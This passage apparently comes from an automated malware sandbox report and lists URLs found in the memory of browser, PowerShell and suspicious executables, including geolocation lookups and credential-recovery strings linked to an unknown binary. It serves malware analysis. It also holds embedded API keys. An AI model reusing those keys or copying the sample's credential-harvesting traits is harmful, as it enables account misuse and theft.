Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://c.pki.goog/r/r4.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://c.pki.goog/we2/64OUIVzpZV4.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: chrome.exe, 0000000C.00000002.1541185539.0000781402A98000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2518531242.0000000000B84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2518531242.0000000000B84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpX
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://i.pki.goog/gsr1.crt0-
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://i.pki.goog/r4.crt0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://i.pki.goog/we2.crt0
Source: msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: powershell.exe, 00000007.00000002.1407475792.000001CD715D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1385587555.000001CD63048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1407475792.000001CD7170A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://o.pki.goog/we20%
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000007.00000002.1385587555.000001CD62ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chrome.exe, 0000000C.00000002.1538718604.0000781402518000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: powershell.exe, 00000007.00000002.1385587555.000001CD61501000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000002.1401457810.00000000023E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 0000000C.00000002.1545706197.0000781403040000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: powershell.exe, 00000007.00000002.1385587555.000001CD62B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000007.00000002.1385587555.000001CD62ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msedge.exe, 00000013.00000002.1631516058.0000450C00050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv37EE.tmp.13.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521817083.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000F.00000002.1449845530.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: chrome.exe, 0000000C.00000002.1538718604.0000781402518000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/update2/response
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521817083.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000F.00000002.1449845530.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 0000000F.00000003.1447956612.000000000331D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000F.00000003.1446895823.000000000331D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521817083.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000F.00000002.1449845530.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: recover.exe, 0000000F.00000003.1447956612.000000000331D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000F.00000003.1446895823.000000000331D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.compData
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521817083.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000F.00000002.1449845530.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 0000000D.00000002.1476529428.0000000000C34000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 0000000F.00000002.1449845530.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: chrome.exe, 0000000C.00000002.1528990030.0000026A26970000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1545341973.0000781402FC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000000C.00000002.1550434430.00007814038CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000000C.00000003.1518004176.0000781402498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1518061236.000078140249C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
Source: powershell.exe, 00000007.00000002.1385587555.000001CD61501000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1631397999.0000450C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: msedge.exe, 00000013.00000002.1633149672.0000450C002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1633063431.0000450C00288000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1571980789.0000450C00274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv37EE.tmp.13.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1548612242.00007814035C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000000C.00000003.1503151062.00007814035B0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1538028783.0000781402380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1541185539.0000781402A98000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: chrome.exe, 0000000C.00000003.1502271559.0000781403634000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
Source: chrome.exe, 0000000C.00000003.1502624289.000078140377C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1548000258.0000781403458000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1503151062.00007814035B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: chrome.exe, 0000000C.00000002.1528815534.0000026A265A0000.00000002.00000001.00040000.00000011.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: chrome.exe, 0000000C.00000003.1445286710.0000781000498000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000000C.00000003.1445286710.0000781000498000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000000C.00000003.1445241830.0000781000478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000C.00000003.1505786834.0000781403C3C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1436930679.000078100017C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1437518542.0000781000188000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000000C.00000003.1502669991.00007814028F9000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1509659765.0000781402903000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
